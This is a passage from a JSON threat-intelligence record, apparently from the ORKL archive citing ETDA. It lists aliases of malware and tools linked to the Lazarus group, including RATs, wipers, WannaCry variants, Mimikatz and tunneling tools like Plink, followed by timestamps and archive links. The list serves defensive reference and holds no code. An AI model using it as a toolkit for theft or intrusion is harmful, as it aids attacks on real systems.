RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434201, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64.pdf", "text": "https://archive.orkl.eu/1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64.txt", "img": "https://archive.orkl.eu/1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64.jpg" } }